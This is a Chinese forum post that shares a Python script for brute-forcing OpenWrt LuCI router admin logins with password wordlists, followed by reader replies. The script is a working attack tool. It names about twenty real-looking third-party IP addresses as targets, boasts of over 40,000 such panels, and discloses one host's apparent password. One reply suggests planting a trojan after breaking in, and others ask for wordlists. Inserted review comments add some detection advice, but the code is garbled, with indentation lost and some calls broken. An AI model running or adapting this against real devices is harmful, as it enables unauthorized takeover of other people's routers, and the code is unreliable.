openwrt 后台密码爆破
#! / usr / bin / python
# -- coding: utf-8 --**
import requests
import aiohttp
import asyncio
import sys,os
import time
import json
import logging
import atexit
# 配置logging
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Template for the progress record that main() stores in jsonss['data'].
# NOTE(review): savejson() writes jsonss to example.ini as plain JSON, so the
# wordlist position and any recovered password end up on disk in clear text;
# that file is an artifact worth collecting when examining a host that ran this.
sadgfg = {
"issuccess": False,
"passflie": {
"fliepath": "",# wordlist file name
"line": 0# how many lines of the current file have been tried
},
"datasucc": {
"user": None,# username currently being tried
"password": None,# password that succeeded
}
}
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
handlers=)
from termcolor import colored, cprint
# Load the saved progress state from example.ini in the working directory.
# Mode "a+" creates the file when it does not exist yet.
def GetJsonini():
with open("example.ini", "a+",encoding="utf-8") as f:
# "a+" positions at end of file, so rewind before reading.
f.seek(0,0)
if f.readlines():
f.seek(0, 0)
# Hands the result of f.readlines() to json.loads.
return json.loads(f.readlines())
else:
# Empty file: start from a state with no per-target data.
j = {
'data' : {}
}
return j
# Overwrite example.ini with the JSON serialization of `j`.
# The file is written unencrypted; whatever `j` holds (target URL keys,
# progress counters, a recovered password) is readable by anyone with access to it.
def savejson(j):
with open("example.ini","w",encoding="utf-8")as f:
f.seek(0,0)
f.write(json.dumps(j))
# Module-level state, loaded once at import time from example.ini.
jsonss = GetJsonini()
# Runs at interpreter exit: persists the state, then shuts logging down.
def exit_handler():
savejson(jsonss)
logging.shutdown()
# Registered so the state is saved on every exit path that runs atexit hooks,
# including the sys.exit() calls in test() and main().
atexit.register(exit_handler)
url = None
data = {
"luci_username": "root",
"luci_password": "123456",
# "Submit": "登 陆",
}
currenttime = time.time()
# Asynchronous form of one login attempt: POSTs the module-level form `data`
# to `url` with luci_password set to `mobile`, while holding the semaphore `sem`.
# Only ss() schedules this coroutine, and no call to ss() appears in this listing.
async def getpage(mobile,sem):
async with sem:
# Referer and User-Agent are fixed strings, not derived from `url`, so every
# request sent through this path carries the same values; defenders can match
# on them in web access logs.
headers = {
# "uuid": "6B9CBB8F-E87E-4C14-969C-96E03E30",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": "http://183.158.77.77:8081/cgi-bin/luci/",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests":'1',
"User-Agent": "Mozilla/5.0 (Linux; Android 12; Mi 10 Build/SKQ1.220303.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/107.0.5304.141 Mobile Safari/537.36 XWEB/5049 MMWEBSDK/20230405 MMWEBID/8973 MicroMessenger/8.0.35.2360(0x28002353) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64 MiniProgramEnv/android"
}
# Writes the candidate into the module-level `data` dict before sending it.
data['luci_password'] = mobile
try:
async withaiohttp.request("POST",url,data=data,headers=headers) as response:
# A non-empty redirect history is taken as a successful login.
if(len(response.history) > 0):
# The accepted candidate is appended to ua.txt in plain text.
with open("ua.txt","a+")as f:
f.write(mobile)
# Prints the candidate and the seconds elapsed since module load, then exits.
print("mima",mobile,"当前耗时",time.time()-currenttime)
sys.exit(cprint('[-] Canceled by user', 'red'))
except Exception as e:
# Any exception is printed and also ends the process.
print(e)
sys.exit(cprint('[-] Canceled by user', 'red'))
# if (re.findall("'login.html\?flag=(.*?)'",res)!="0"):
# print(mobile)
sem = asyncio.Semaphore(20)
loop = asyncio.get_event_loop()
numcount = 0
# Wraps getpage() calls in asyncio tasks and runs them on the module-level
# event loop `loop`, sharing the module-level semaphore `sem`.
# No call to ss() appears in this listing; main() uses test() instead.
def ss(passworlds,sunmmm):
"""
passworlds: list of passwords
sunmmm: how many per group
"""
# NOTE(review): indentation was lost in this listing, so how the statements
# below nest inside this loop cannot be confirmed from here.
for i in range(0, max(int(len(passworlds) / sunmmm), 1) + 1):
a = passworlds
if len(passworlds) - (i * sunmmm) < sunmmm:
a = passworlds[(i - 1) * sunmmm:]
tasks = []
for i in a:
c = getpage(i, sem)
task = asyncio.ensure_future(c)
tasks.append(task)
# Blocks until the scheduled tasks have finished.
loop.run_until_complete(asyncio.wait(tasks))
# Driver: gathers wordlist files from `path`, restores or initializes the saved
# progress for `url`, then feeds candidates to test() and pauses `sleep` seconds
# between rounds. The third parameter is the group size.
# NOTE(review): indentation was lost in this listing, so the exact nesting of the
# loops and branches below cannot be confirmed from here.
def main(path,sleep:int,每组多少个:int):
files1 = []
global jsonss
global numcount
# `path` may be a directory (walked recursively) or a single file; the
# extension checks are aimed at "txt" files.
if not os.path.isfile(path):
for root, dirs, files in os.walk(path):
for file in files:
path = os.path.join(root, file)
if os.path.isfile(path) and path.split(".")[-1:].lower() == "txt":
files1.append(path)
elif path.split(".")[-1:].lower() == "txt":
files1.append(path)
else:
sys.exit(cprint('[-] 请输入路径或者文件', 'red'))
if not files1:
sys.exit(cprint('[-] 目录或路径不对', 'red'))
# No saved record for this url: install the sadgfg template as jsonss['data'].
if not jsonss['data'].get(url,None):
jsonss['data'] = sadgfg
jsonss['data'].get(url, None)["passflie"]["fliepath"] = files1
else:
# Saved record exists and is not marked successful: resume from the stored
# file and line counter.
if not jsonss['data'].get(url, None)['issuccess']:
path = jsonss['data'].get(url, None)["passflie"]["fliepath"]
del files1[:files1.index(path)]
numcount = jsonss['data'].get(url, None)["passflie"]["line"]
else:
# Saved record is already marked successful: nothing left to do.
sys.exit(cprint('已破解成功', 'red'))
for i in files1:
passworlds = []
# Read as bytes; each line is stripped and decoded with the default codec.
for line in open(i,"rb"):
try:
if(line.strip().decode()!=""):
passworlds.append(line.strip().decode())
except:
pass
# Passwords containing other characters (e.g. Chinese) cannot be parsed yet;
# lines that fail to decode are silently skipped.
print("字典密码总数量%s 密码文件:%s"%(len(passworlds),i) )
# Drop the entries already covered by the saved line counter.
del passworlds[:max(numcount,1)-1]
numcount -= 1
# Build the groups that are run below.
temppasswrls = []
for i in range(0,len(passworlds),每组多少个):
if(len(passworlds)-i<每组多少个):
temppasswrls.append(passworlds)
else:
temppasswrls.append(passworlds)
for i in temppasswrls:
for j in i:
test(j)
# Pause between rounds; pacing is set entirely by the caller's `sleep` value.
print("已等待%s秒"%(sleep))
time.sleep(sleep)
# Synchronous login attempt used by main(): one POST of the module-level form
# `data` to `url` per candidate, with luci_password set to `mobile`.
# NOTE(review): seen from the device, this is a run of POSTs to the login URL
# from one client, each answered 403 if the script's assumption about rejected
# logins holds. Per-source limits on failed logins, alerting on that pattern in
# the web server log, and keeping the admin login off WAN-facing interfaces are
# the controls that address it.
def test(mobile):
data['luci_password'] = mobile
global numcount
numcount += 1
try:
# verify=False turns off TLS certificate validation (the warning for it is
# silenced at module top); allow_redirects=False keeps the first response's
# status code instead of following a redirect.
rsponse = requests.post(url,data=data,allow_redirects=False,timeout=15,verify=False)
# Any status other than 403 is recorded as a successful login.
if(rsponse.status_code!=403):
# The accepted password is stored in jsonss, which exit_handler() writes to
# example.ini in clear text.
jsonss['data'].get(url, None)["datasucc"]["password"] = str(mobile)
jsonss['data'].get(url, None)["issuccess"] = True
sys.exit(cprint('[-] 破解成功', 'red'))
else:
# Rejected: remember the position so a later run can resume from it.
jsonss['data'].get(url, None)["passflie"]["line"] = numcount
logging.info('当前处理%s'%(numcount))
except Exception as e:
# Request errors (timeouts included) print their arguments and end the run.
for i in (e.args):
print(i)
# Bare string expression; it has no effect at runtime.
"Read timed out"
print("当前处理",numcount)
sys.exit(cprint('[-] Canceled by user', 'red'))
if __name__=="__main__":
path = "G:\\wpa2pojiezidian\\"# 可以是路径或者文件
每组间隔多久 = 14# 秒
每组多少个 = 800
# 有4万多这样的后台网站
url = "http://222.79.58.51:10001/cgi-bin/luci/"
url = "https://47.87.132.70/"
url = "http://50.46.15.209/"
url = "https://207.181.230.249/"
url = "http://72.80.138.192/cgi-bin/luci/"
url = "http://45.140.88.188:8088/cgi-bin/luci/"
url = "http://60.208.219.68:8088/cgi-bin/luci/"
url = "https://gusomaru.eu.org:8443/cgi-bin/luci/"
url = "http://24.55.7.92/"
url = "http://113.224.62.179:9003/cgi-bin/luci/"
url = "http://113.224.62.179:8332/cgi-bin/luci/"
url = "http://118.113.66.171:1080/cgi-bin/luci/"
url = "http://182.148.152.191:8091/cgi-bin/luci/"
url = "http://119.127.43.78:3000/cgi-bin/luci/"
url = "http://45.33.60.215/cgi-bin/luci/"
url = "http://123.234.164.108:18080/"
url = "https://47.87.132.70/"
url = "http://67.188.234.70:8088/cgi-bin/luci/"
url = "https://96.45.163.18:2096/cgi-bin/luci/"
# "http://183.158.77.77:8081/cgi-bin/luci/"密码password
main(path,每组间隔多久,每组多少个)
A* B=C
设B为密码,C为包。A为加密方式。
为什么要穷举B,不用C。
是不是只要知道每个软件的加密方式,就可以直接得出密码? simmtech 发表于 2023-6-23 17:48
太复杂 了,还是要支持 。
下次研究一下群晖的后台密码爆破 太复杂 了,还是要支持 。 谢谢分享! 求一个字典下载,谢谢 这个不错呀... 爆破进去,直接木马 积少成多!真厉害呀! 这样都行,那好吧 File "E:\CodeDocker\openwrt 后台密码爆破.py", line 33, in <module>
from termcolor import colored, cprint
ModuleNotFoundError: No module named 'termcolor' 老衲 发表于 2023-6-23 22:23
安装一下这个模块就好了